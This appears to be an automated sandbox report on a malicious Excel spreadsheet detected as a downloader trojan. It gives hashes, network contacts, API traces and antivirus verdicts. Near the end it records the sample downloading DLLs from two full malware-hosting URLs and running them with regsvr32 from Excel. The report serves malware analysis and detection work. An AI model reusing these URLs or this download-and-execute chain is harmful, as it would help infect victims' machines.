popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

plan-1811162309.xlsb

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 June 29, 2021, 9:38 a.m. June 29, 2021, 9:42 a.m.
Size 88.0KB
Type Microsoft Excel 2007+
MD5 e489a06471cbbe594a1ff7c306db410e
SHA256 25d46204f9bb8624d15d13296f31f2837323e25298480f4f8595a903c06e39d6
CRC32 0EE8A507
ssdeep 1536:MlHoxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncjv0/Ci:8Dbr0o45GUgHhX8jC9ySa
Yara None matched

Name Response Post-Analysis Lookup
gruasphenbogota.com
A 50.116.92.246
50.116.92.246
carpascapital.com
A 50.116.92.246
50.116.92.246
IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
50.116.92.246 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e5e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 5032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73711000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06fb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06fb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06fc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5032
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\gihi2.dll
file C:\Users\test22\gihi1.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000398
filepath: C:\Users\test22\AppData\Local\Temp\~$plan-1811162309.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$plan-1811162309.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000408
filepath: C:\Users\test22\AppData\Local\Temp\~$plan-1811162309.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$plan-1811162309.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000404
filepath: C:\Users\test22\AppData\Local\Temp\~$plan-1811162309.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$plan-1811162309.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 ..\gihi2.dll
cmdline regsvr32 ..\gihi1.dll
host 172.217.25.14
MicroWorld-eScan Trojan.DOC.Agent.AWO
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
Arcabit Trojan.DOC.Agent.AWO
Cyren XF/IcedID.C.gen!Camelot
ESET-NOD32 DOC/TrojanDownloader.Agent.DEP
Avast VBS:Malware-gen
BitDefender Trojan.DOC.Agent.AWO
Ad-Aware Trojan.DOC.Agent.AWO
McAfee-GW-Edition X97M/Downloader.iy
FireEye Trojan.DOC.Agent.AWO
Emsisoft Trojan.DOC.Agent.AWO (B)
MAX malware (ai score=86)
Microsoft TrojanDownloader:O97M/EncDoc.AVI!MTB
GData Trojan.DOC.Agent.AWO
McAfee X97M/Downloader.iy
Rising Downloader.Agent/XLM!1.D77C (CLASSIC)
Ikarus Trojan-Downloader.DOC.Agent
Fortinet MSExcel/Agent.DEP!tr.dldr
AVG VBS:Malware-gen
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: https://carpascapital.com/gBPg8MtsGbv/ka.html
stack_pivoted: 0
filepath_r: ..\gihi1.dll
filepath: C:\Users\test22\gihi1.dll
2148270085 0

URLDownloadToFileW

 url: https://gruasphenbogota.com/C74hwGGxi/ka.html
stack_pivoted: 0
filepath_r: ..\gihi2.dll
filepath: C:\Users\test22\gihi2.dll
2148270085 0
parent_process excel.exe martian_process regsvr32 ..\gihi2.dll
parent_process excel.exe martian_process regsvr32 ..\gihi1.dll